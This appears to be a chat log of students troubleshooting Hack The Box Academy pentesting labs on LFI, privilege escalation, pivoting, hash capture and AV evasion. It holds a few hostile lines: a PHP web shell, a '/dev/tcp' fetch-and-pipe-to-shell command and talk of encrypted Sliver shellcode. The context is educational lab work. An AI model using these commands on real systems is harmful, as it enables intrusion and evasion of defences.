File Inclusion - skill assessment, i got to read the /etc/passwd, i'm struggling at the RCE part ... any hint ?

Well /et/passwd doesn't exist

Do you need RCE?

I tried changing syntax and got this:

C:\Users\htb-student>certreq.exe -Submit -config http://10.129.170.187:8000/ c:\windows\win.ini
Certificate Request Processor: ASN1 bad tag value met. 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)```

can someone help me fix this?

from the course: If you get an error when running certreq.exe, the version you are using may not contain the -Post parameter. You can download an updated version
cant post the exe link here
did you try it?

yes but windows box can't access internet

that's the first thing I tried

can't you transfer the file? in a file transfer module ..

The target boxes can't access the internet goober

That's a lot of extra work tbh

not for me

this is what I think too I already thought of that

I'd skip this method then

ok I'll just skip it ya thanks

Tbh

ok thank you I'll just do that

I get the general idea anyways

i guess that s what i did..

that s bad advice

its not bad advice because I get how to do it anyways

and if not I'll be doing it again later in CPTS course as part of more advanced modules. but I get the idea.

you don't need to know every method ¯_(ツ)_/¯

I tried all the wrappers, i dont see any other way

Most flag locations are under /flag.txt for these, does the question give you a location?

yes, it says find the flag in the / root directory

So... why not try /flag.txt instead of /etc/passwd

nothing echos

A lot of the pentesting / bug bounty modules are pretty straightforward....but then again I over complicate things

Hi, everyone!
Someone solved dynamic analysis in evasion techniques module?

what up gangstas

Hello guys, hope you are doing well!

I am spending my second day searching for an answer for this task, I would highly appreciate your assistance on that.

**WINDOWS EVENT LOGS & FINDING EVIL - Skills Assessment - Task 1 **

By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack. Enter the process name as your answer. Answer format: _.exe

1. I configure the sysmonconfig-export.xml (to catch Event Id 7 logs)
2. I wrote an XML script which shows me Event ID 7 logs with Signature: False

There are only 14 logs all with mmc.exe, which is not the real answer. How can I solve this?

Thank you in advance!

is there another workaround for rdp timeouts? I'm using timeout/80000 & I still get [13:55:10:400] [42933:42935] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]

Should be /timeout:80000

But also try resetting your vm

Could be some cache thing being dumb, also try resetting target, changing vpn regions

looks like my meterpreter died, working on that rn

https://academy.hackthebox.com/module/77/section/843 I'm doing this task:

I got as far as this, using msfconsole plugin for wp backup. My question is, it defaults to downloading /etc/passwd, which is for logging into the system via ssh I guess. reading shadow/passwd and unshadow and crack it, or use crackstation?

OR...

Somehow I'm supposed to download a wp backup and get the wp db, and get the admin password so I can login and get the flag?

I'm confused as to what I'm supposed to do here.

Hmm. It reads passwd, but not shadow. So I'm guessing it runs as the www-data user or something, and doens't have access to read the shadow file.

Read the task again, you don't need the backup or db file

Oh I got ya

Also check options

I'm supposed to get /flag.txt

I got it

👍

Thank you

https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_simple_backup_file_read/ I used this link to figure out how to use msfconfole to find exploit

I mean

search <plugin name>

Then use N where N is the exploit you want

Umm I can safely say you over thought this lol after you configured the sysmonconfig did you try viewing the event ID on event viewer?

As a note, be prepared to research things if you don't get it at first

an someone help me with this question, of broken autentication module?:

On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?

it does not specify in which format it has to be entered or if it is lowercase or not, I have been trying different ways for a while and it does not catch me.

Reset?

It's likely in the reading anyway

So just double check

thank you, it was my English problem

Sorry, I didn't understand you. Do you mean have I tried to search for Event Id 7?

Yes. After you configured the sysmon config did you search for the event ID on event viewer?

If I remember correctly there is a lot sysmon event id 7 in the logs. You are looking at the right place. I tried as well with xml, but I had better results with another get-winevent method. I had to google a bit to fine tune the command.

just curious.... i tried capturing a hash by executing xp.. dirtree from MSSQL server and using impacket-smbserver

[*] User WIN-HARD\ authenticated successfully [*] :::00::aaaaaaaaaaaaaaaa

that's what i captured

wondering what it means when we don't see any user being authenticated

it doesn't really matter for the challenge i';m on i think but i'm just curious

what module and section?

i was working on the "Attacking common services" section hard lab

In the attacking databases quiz I did succhessfully capture a hash for mssqlsvc account using this technique

I didn't actually need to do this to complete the hard lab

I just wondered what it meant where the hash was basically empty

ah

maybe null login

yeah there's no user for that

WIN-HARD\ is the domain/computer name

yh

curious i had not seen that before

I think i should probably submit an errata for the solutions of the medium lab

there's an errata channel somewhere right?

found it

it might be intentional so idk

¯_(ツ)_/¯

i remember not needing the hash for mssqlsvc for that exam

rather needing to do something completely different

I'm doing an exam currentely and I have a problem with the submission.

Where I can contact an administrator?

message support on the website

there is no support for the exams on the discord

indeed :). I got there in the end

moving on to the network pivot module

is everyone just using ligolo-ng to do pivoting now?

no more ssh local port forwarding proxy chains etc.etc.?

i mean it's a lot simpler to use, but it's good to know multiple tools, in the event you only need something quick

For sure

https://academy.hackthebox.com/module/77/section/844

I am doing this task. The machine I have started and connected to via ssh. I am not able to download linpeas.

I started a local python http server on my parrot VM. python3 -m http.server on 8000
I ssh into target machine with user1.
I do wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh or wget http://my.vpn.ip:8000/linpeas.sh and it just never connects.

What am I doing wrong if anything? Do the machine no have any internet connectivity?

machines do not have internet connectivity

is linpeas in the directory you launched the http server from?

Yes, it's not that it is a 404 not found, it's that it times out trying to connect to my VPN tun0 ip

http.server serves the directory you're in (and any subdirectories)

try:

• resetting the target
• changing vpn regions
• use SCP to copy the file over (syntax SCP source destination)

linpeas is absolutely not required lol

Locally:
─$ sudo nc -q 5 -lvnp 80 < linpeas.sh
listening on [any] 80 ...

On target:
cat < /dev/tcp/10.10.14.125/80 | sh

It times out.

I've tried multiple methods.

I also did nv -vz myvpnip 80 and nothing. Netcat logs nothing incoming

and can often spit out a lot of info that makes no sense and only a few bits of relevant info

Ok np.

I'll try doing those things

plenty of other methods to list what your user might be able to (su)do

I tried: find / -type f -perm -04000 -ls 2>/dev/null to list all suid binaries, then on GTFO I tried whatever I found, it keeps saying user1 is not allowed to execute. I'm trying. Let's see

you're overcomplicating it

sudo -l 😉

also this one is a publicIP:port; so you won't be able to get a reverse connection

Oh hang on.

see: User Privileges Subsection

It's not a VPN machine. It's just a container I think on a random port, so it won't connect back to VPN that's why.

Oh you just said that 🙂

Thanks

yeah

the User Privileges Subsection details stuff you can do btw 😉

almost exactly

So I don't really need the VPN for academy, do I? VPN is for main site?

you gotta get from user1 → user2 then user2 → root

Ok I'll try more, thanks

you still need vpn, it's just this question doesn't use it

Oh ok.

→ 10.129.x.x = VPN required
→ PublicIP:Port = No VPN (and no reverse connections)

I did sudo -l already and I can't run anything as sudo.

user2 has nopasswd on /bin/bash, so he can launch bash with his sudo access and get a root shell, np. But I'm stuck on user1 😦

OMG

I suck at reading.

User user1 may run the following commands on ng-1014841-gettingstartedprivesc-hjrlt-546d885f89-tqjlm:
(user2 : user2) NOPASSWD: /bin/bash

user1@ng-1014841-gettingstartedprivesc-hjrlt-546d885f89-tqjlm:~$ sudo /bin/bash
[sudo] password for user1:
Sorry, user user1 is not allowed to execute '/bin/bash' as root on ng-1014841-gettingstartedprivesc-hjrlt-546d885f89-tqjlm.

hmmmm.

reread the subsection i said earlier

I read it twice. I'll do ti again

it shows what to do when you see (for example) (user:user) NOPASSWD /bin/*

Oh

Sigh. That's so silly.

https://academy.hackthebox.com/achievement/667914/103 :D

You miss the most obvious things.

I understood now

yep

Thanks duder

np

i forgot that it shows the syntax for that tbh

For Attacking Common Applications - Attacking Thick Client Applications, I'm unable to get the .bat file to populate after changing the user's temp folder permissions. Any ideas as to what I might be missing?

I completed file transfers module

You know what, I might try the academy section out and see how well it helps me.

Module: Password Attacks -> Attacking SAM.

Anyone know how to transfer files from Windows (RDP connected) machine to a local Kali VM running smbserver.py? I'm trying to use 'move' from the Windows machine with the private IP for OpenVPN to connect back to the Kali VM but it's unable to recognise the machine.

Hello, I am in the Introduction to windows evasion techniques static analysis section and have been stuck for the past few hours. I am AES encrypting my payload and using the same format as shown in the module example, but when I compile and run the program I keep getting the same error. The error says its a padding issue so I tried with various types of padding but nothing worked. Could anyone please tell me what I am doing wrong?

there are multiple ways to transfer the files, regarding the one you are trying you might need to map the share before accessing it:
net use n: \\10.10.10.10\<share-name>
then you should be able to access the share
I would prefer to use copy over move
you also can change the letter n to your convenience
sometimes windows require a user and password to be set on a smbshare but that might not be the issue in your case

did you remove the new lines in your input? also your shellcode size seems off

I did, also the size seems off because im using sliver stager shellcode. But I tried it with meterpreter too and it didnt work

Thanks for the response, unfortnately the net use command is still giving the "network path was not found" error.

the output also seems off

you don't have to use net, just the network path should do \\ip\share

Yeah it's the same error. It cannot find the network path. I'm following the instructions set out in the module using CompData as the share.

can the target reach your smb server?

I'm able to ping the OpenVPN private IP from the Windows machine

works fine for me, you should see something pop up in your smbserver if the connection is successful

mm okay, I tried to copy what you've done here but I still get the same error. Are you running smbserver from a VM or from your local OS?

vm but it shouldn't matter

do you have firewall enabled?

Yeah, you're right. I tried encrypting with the key and iv in the module and am getting a much different result. Any idea what im doing wrong?

It's disabled on the Windows machine. I'm using a macbook pro so not sure if there is some config that may be causing the issue.

your key and iv should be a 16 byte hex string, so you'll want to remove the 0x and commas

running in a vm?

The Windows machine is a VM (HTB machine), MacOS is my local OS and Kali is my hacking VM. I'm using OpenVPN Connect (Desktop GUI) to connect to the HTB network.

hold on, where is openvpn running? on your host or kali?

On my host

yep that's the problem, the target have no way of reaching the smbserver on your kali since they're different interfaces

always connect to the vpn in kali itself

cyberchef automatically converts it, but anyway I tried it and it doesnt change anything

Ah okay awesome, that makes sense. I'll give it a go now. I've been doing most of the machines from my Mac, just that smbserver.py wasn't working on MacOS so I jumped over to Kali for this module.

Module: Password Attacks
Section: Password Mutations

Refered to previous conversation, I gave up attacking the ssh port an went for the smb port instead with netexec

hydra returned that the smb port can accept any passwords while it isn't the case in reality (neither sam with any "successful" attempts shown in hydra, nor a null session can get me in the smb server via smbclient)

Still I can somehow list shares via null user in netexec, is there any thing I missed again?

(PS: I am using the mutated wordlist generated with the example command hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list)

never mind I saw thats another surface I can touch

put the shellcode on pastebin or something and send it here

Ok, so I've figured out the problem is the content isn't being encyrpted. But idk why. If I change anything in the key it doesnt work

So i dont think key is the problem

All working now, thanks for the help! You're a legend!

yep thought so, your output looked weird

xfreerdp has the /drive: option

btw

How come the Windows Privilege Escalation doesn't have any service binary hijacking or unquoted service paths? Did I miss something?

those are covered in the Weak Permissions section of the module

Thank you

I GOT IT TO WORK!! the problem was so dumb... the output format was set to hex in cyberchef and that was messing with everything

Thanks for everything!

why im getting fuzzed in all playloads? . In using web proxies - zap fuzzer

oops I missed that too, glad you figured it out

read the task so you know what you're also fuzzing for iirc it gives you some text to also match for with the wordlist once you get in

i am doing the LFI module, and for some reason when I encode to base64 echo '<?php system($_GET["cmd"]); ?>' I get a different result if I encode it to base64 with burp or cyber chef in comparison with encoding it from the terminal

anyone faced something like this ?

If you pipe the output from echo … to base64, there will be a newline character at the end that‘s included in the base64 ouput. Use echo -n … and the base64 should match the one from cyberchef / burp

Cool thanks, will check it out

yeah I tried with -n and it still did not match

nvm fixed now, I was adding extra quotes

Hey

Is kali linux go For hacking

sure

it is pretty standard in the industry

DM me if you want to discuss this ^^

hey, could you remove the command you used, as it an answer for a skill assessment

this is a spoiler for the assessment; please refrain from posting these

Why am i banned ?

https://academy.hackthebox.com/module/67/section/1637

Windows PrivEsc - Pillaging Section

I have 1 question left, to find the hashes by restoring a backup (that used rustic). I have restored all available backups but can't find any of the hashes. Even in the walkthrough, the backup of \windows\system32\config where the hashes would be, can't be backup due to permissions.

so despite going through the steps many many times, i cna't figure out what i'm meant to do?

Sorry, I didn't know about this regulation.

can't remember exactly how I did it but I'm thinking about sam and system hives

hi

yea i figured, but where?

I'm having trouble getting the credentials supplied in question 2 of module Pivoting and Tunnelling section SSH local port forwarding and SOCKS proxy to work.

I have connectivity to the host with RDP but the credentials supplied don't seem to work

Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

i used victor as username and pass@123 as password

you got that Jeff password, is he able to create new backups? like a VSS of C:?

yea, which i've done, but he cant write the config directory that would hvae the hashes

you → host1 → host2 → host3

if you read carefully, there's another system in the middle there that they give you creds for

i'll stop here, i might be in a rabbit hole

ok. but where am i meant to look?

ive restored all of the backups and found nothing

i can't tell without redoing the exercise and i can't do it at the moment.
I do not take precise notes on them if there is no new tricky thing straying off the course material. Just because i don't want to focus too much on past results when facing a new problem. I might give it a go later if you're still stuck

no prob. and i probably will. ive been doing it for a while lol

lol my rabbit hole is: not focus on the config directory but trying to have access to the hives in system32. But as i said i don't remember the particularities of the exercise so it might be completely off track

the hive files are in the config directory though

meh

you mean the ssh creds for the pivot host?

read the section carefully

ok

so if you restore config directory like the 'restore' part of the course?

unless i'm misunderstand which section you're on

in which case it helps to provide the section name

not "question 2" and stuff like that

yup. exactly as shown, and its an empty folder

I am on the section titled "Dynamic Port Forwarding with SSH and SOCKS Tunneling"

third section in the pivot and tunnel module

the question asks us to use the pivot host to rdp onto a host on the internal network.

lol ok i'm done for now, i've to go and i can't wrap my head around it without trying it, cheers mate

yea thats alright. im resetting the target. and will keep trying

all the other questions were easy for me, but this 1 has been a pain lol.

ah my bad i was thinking of the double pivot section where most other people get stuck

no worries i wasn't very clear initially

i just did a local port forward to achieve the connectivity and seems to work fine

i get rdp connection etc.

just the creds provided don't seem to work

they should work

ok, unless i am rdp'ing onto something else... not sure how

/u:victor /p:pass@123 should be the user/pass

and the /v:172.16.5.19

well no the v:

localhost:1234

ah

no it's not localhost:1234

it's the targetIP 1234

iirc

either way it's something that's awkward to do

mmmm well target IP is not reachable directly

yes

so we forward a local port using ssh

you need to use a dynamic chain

well that's what i did

not a local

-D not -L

and proxychains

hmmm I feel like we don't need to in this case

we just need to forward one port

or is that impossible

so localhost:1234 will be forwarded over the tunnel to targetIP:3389

this is not that kind of server, and i suggest you not ask others to perform illegal actions

ssh -L 1234:172.16.5.19:3389 ubuntu@10.129.203.158

ssh client on my machine should forward all packets received on localhost 1234 over the tunnel for the destination ip

of cousrse we can also use proxychains etc.

but i don't believe it's necessary for this question

-D 9050 and edit your proxychains.conf, ensure that only the socks4 9050 is uncommented out at the end

proof doing it that way works

ok i must be missing something in my understanding

the hint of what you need to do is in the section title DYNAMIC

it just doesn't make any sense to me

why would i need to do dynamic port forwarding. when i only need to forward to one destination port

i'm gonna do it that way anyway

perhaps i'm getting rdp access to some other box!

well the box you need to gain access to is a different box entirely

yes

but i get the rdp interface

so i'm assuming it's the right box

but maybe there's another box with an rdp listener

it should be the right box

i’ve just done an unauthenticated rce exploit, how do i actually gain the initial foothold? do i need to run a reverse shell?

you wouldn't be able to access it if it wasn't

helps to know what academy module you're working on champ

and reverse shells are an it depends type thing

if on academy and it's a public_IP:port; you're gonna have a hell of a time trying to get a revshell to run

also if you have RCE, why not just look for files

¯_(ツ)_/¯

ok it worked

without the proxychains

¯_(ツ)_/¯

i was using rdesktop

i didn't need to do dynamic port forwarding

haven't used rdesktop before so idk how it works

got a question about the last hop of the skills assessment for the pentester path lateral movement module: i've got an open RDP session tunneled over SSH, and i'm trying to discover alive hosts on the 172.16.6.0/23 subnet which i assume is where the domain controller is going to be, but i'm not seeing other hosts responding to my ping sweeps other than the hosts that i've already compromised. i've used a powershell one liner to ping the network range, and the post/multi/gather/ping_sweep module in meterpreter, but neither have revealed any new hosts. is there something that i'm overlooking here?

but yeah requesting localhost:1234 @zealous rune after setting it up your way and that also works

but tbh your way really only works if you know for sure where you're sending things

well yh

if you need to go through multiple machines, dynamic is just better

we do in this case because it's defined for us

also less typing

nah

-D is almost always better

we have the IP:port

UNLESS YOU NEED TO FORWARD SPECIFIC PACKETS TO PORTS

depends innit

nah

-D is just better overall, you don't gotta do it for each individual item/port combo

dynamic is necessary when u don't know which destination ports u need to forward to

listen

let's agree to disagree until you can get through a day without ramming headfirst into a wall :)

but if u know you want to access a specific destination IP on a specific destination port then a simple ssh local port forward will suffice

😄

i like elegance and simplicity 🙂

let's agree to disagree

if you are referring to the Windows Lateral Movement module, it is not part of any path as of yet

-L is not elegant LMAO

@fathom pendant thanks for the hints as always

btw to show I did both ways

either way; first try all methods before trying to brute force another

nah not the Windows one, the pivoting tunneling and port forwarding one for CPTS. apologies for the confusion 😅

the last question? you don't need to do another hop

its just that using sh -L 1234:172.16.5.19:3389 ubuntu@10.129.203.158 has less moving parts than adding proxychains.... I'll leave it there¬

i mean in general proxychains is like one line to edit

instead of needing to remember which IP; port; etc you're forwarding

and is less prone to typos

fair enough

sure i'll be back shortly once i find the next wall

I am getting this response when I try to ping the target in one of the htb academy module. I have my vpn on.

don't rush to the discord when you hit the wall

reset the target

Worked! Thank you.

slogging my way through the file inclusion module wooo

I wont'

solved my own problem. i was on the second-to-last question that told me to make a final hop using a "common remote access solution", and for some reason the ping_sweep module didn't pick up the hosts on the 172.16.6.0/23 subnet the first time, but i ran it again and it found them the second time. i can see now that it wasn't really a "hop" per se

btw i believe the diagrams in the pivot and tunneling module could represent things "better"

their a bit confusing

it's honestly just best to do the sweep from the host

so you're not relying on the proxy to not drop connections

yeah that's possibly what happened the first time

although i was running the powershell ping sweep on the host and it didn't find anything either

also sometimes it's just dumb like that

¯_(ツ)_/¯

it's also possible you just overlooked it

it's overall dumb

How do i type in #general ?? it tells me the check out this chat instead 👀

i mean possibly, staring at the terminal for too long makes me see funny sometimes, but i'm pretty sure i didn't miss anything

oh well, i got there in the end